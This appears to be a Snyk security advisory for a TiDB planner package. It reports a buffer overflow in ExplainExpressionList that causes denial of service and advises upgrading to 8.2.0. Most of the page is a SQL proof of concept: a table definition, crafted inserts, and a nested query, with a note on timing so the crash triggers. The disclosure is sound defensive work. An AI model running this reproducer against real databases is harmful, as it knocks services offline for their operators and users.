Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade github.com/pingcap/tidb/pkg/planner/core
to version 8.2.0 or higher.
Affected versions of this package are vulnerable to Buffer Overflow via the component expression.ExplainExpressionList
. An attacker can disrupt service by sending specially crafted input.
create table t_ldpj7bp (
c_w_jr14qm2 int ,
c_t3nd927 int ,
c_ts int ,
c_s text ,
c_qchmg double ,
c_r int ,
c_olb3fsg6 text ,
c_zkbe tinyint ,
primary key(c_w_jr14qm2) NONCLUSTERED) shard_row_id_bits=8 pre_split_regions=5;
-- sql #267
alter table t_ldpj7bp set tiflash replica 1;
insert into t_ldpj7bp (c_w_jr14qm2, c_t3nd927, c_ts, c_s, c_qchmg, c_r, c_olb3fsg6, c_zkbe) values
(730552758, -682774206, 1698439632, 'lrvil359', 18446744073709551616.5, cast(cast(null as signed) as signed), 'oj1', (-1367510804 in (
2123597870, 1485484027))),
(-1001332962, -1396443960, cast(cast(null as signed) as signed), 'e43lh', 15.54, -1568307927, 'i', (-1162033997 not in (
-1850570375, -781179836, -1281662147, -431391092, cast(null as signed)))),
(-727295464, 1998529670, -1873237194, 'lps56o', 70.81, 1380690610, cast(null as char), ((NOT NOT(cast( (cast(cast(null as signed) as signed) && cast(2536017375093623800 as signed)) as unsigned))))
and ((NOT NOT(cast( (cast(2051320819 as signed) <=> cast(-8632453786780487783 as signed)) as unsigned))))),
(2133408768, 736339957, -1486317339, 'f', 62.97, -1444096406, 'tj', (NOT NOT(cast( (cast(cast(null as char) as char) = cast(cast(null as char) as char)) as unsigned))));
-- [[NOTE]] please wait a while before executing the following sql, otherwise the bug may not be triggered.
SELECT
ref_0.c_t3nd927 as c2
FROM
t_ldpj7bp as ref_0
WHERE
(EXISTS (
select distinct
cast(cast(null as signed) as signed) as c0
from
(select
ref_1.c_w_jr14qm2 as c0,
ref_1.c_ts as c1
from
t_ldpj7bp as ref_1
where (NOT NOT(cast( (cast(2147483648.100000 as double) || cast(78.5 as double)) as unsigned)))) as subq_0
where (NOT NOT(cast( (cast(ref_0.c_t3nd927 as signed) <> cast(-2308981195293685378 as signed)) as unsigned)))
order by c0 desc))
ORDER BY
c2 ASC
LIMIT 55;